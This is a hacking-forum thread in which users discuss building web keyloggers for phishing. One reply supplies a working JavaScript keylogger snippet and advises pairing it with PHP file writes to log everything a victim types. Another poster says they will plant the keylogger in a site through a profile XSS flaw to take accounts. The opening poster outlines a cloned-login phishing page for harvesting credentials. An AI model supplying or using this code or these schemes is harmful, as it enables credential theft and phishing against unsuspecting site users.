PHP Keylogger
As most of you are aware, there have been many phishing sites around. I know it is possible to keylog stokes on webpages using javascript but seeing as in this shows up in the page source I was wondering if it's possible to be done in PHP soley.
If you know how I would be able to do this, could you please tell me the functions I should look into. I have a basic knowledge for PHP but google doesn't teach, it tells and I'm not looking for an answer xD
Flash.
Err.. I am not really good in php, so I can't give you the awnser.
BUT, I have found a site with ALL the php commands, so maybe you can ctrl-f and try to search for a command and get lucky?
I have nothing to do so I will search, too.
Here's the site: http://php.about.com/gi/dynamic/offsite.htm?zi=1/XJ&sdn=php&zu=http%3A%2F%2Fwww.php.net%2Fquickref.php
Javascript keylogger = pretty easy to find/create.
Take this one for example:
winKL = window.open('log.txt','KeyLogger','directories=no,menu=no,status=no,resizable=no');
winKL.document.write('<html><body onLoad="self.blur();">');
document.onkeypress = function () {
key = window.event.keyCode;
winKL.document.write(String.fromCharCode(key));
}
self.focus();
</script>
I don't see what use this would be. I mean, if you get someone to visit your site, you can see everything that they submit. And they are only going to type if they have a reason to enter data.
But if you have a reason, just combine the JS example with php's file commands and you can dump everything the user types into a file.
Not too sure if this will help you havn't really messed with these but here ya go??
blackbird wrote: Ya well, I was hired by a site to find security holes. and it had accoutns worth hacking. i found a security hole were you edit your profile that allowed you to submit ANY javascript.
i can easily put the keylogger there and get all acounts!:happy:
woo hoo… if someone visits your profile, you can log keystrokes. who is going to be typing anything on your profile page? How can yu get all the accounts? No one is going to log in from your profile page. You might catch one person every blue moon. If you couldn't figure this out yourself using common sense, I feel sorry for the poor people who hired you.
as for doing it with PHP soley, I've been looking around. Not that I canfind. You can do it in PERL. I'd writte the keylogger in PERL (itll take a bit o fresearch, but its possible) and use that. I think PHP retty much depends on javascript for keylog functions.
You could always encode the gibberish: can't it have the same funcitonality if you write it using URL incoding? Or perhaps ascii values… i dunno. I'm not a big javascript person, but there is a way to do it.
Thanks for you replies people.
@Grindordie - I know the difference but wasn't aware if you could do this with PHP.
@Spyware - Thanks for the links and code etc. Much appreciated
@Deathrape - Thanks for your reply and neither am I a JS person, I know enough to get me by but not to make scripts worth having. Now is the time to get it done.
For consellation, I thought of another way it will be possible… not soley towards keylogging but to log what the user 'submits'. EG you copy the site image to image css to css source to source and have the login in a 'submit news' form. Using URL manipiulation direct the victim to the fake page. When the user inputs the details it will be posted on another page then redirected to one from the original site.
That is just an idea if someone else was interested in this.
woo hoo… if someone visits your profile, you can log keystrokes. who is going to be typing anything on your profile page? How can yu get all the accounts? No one is going to log in from your profile page. You might catch one person every blue moon. If you couldn't figure this out yourself using common sense, I feel sorry for the poor people who hired you.
obviosly u have no idea wat im talking about……..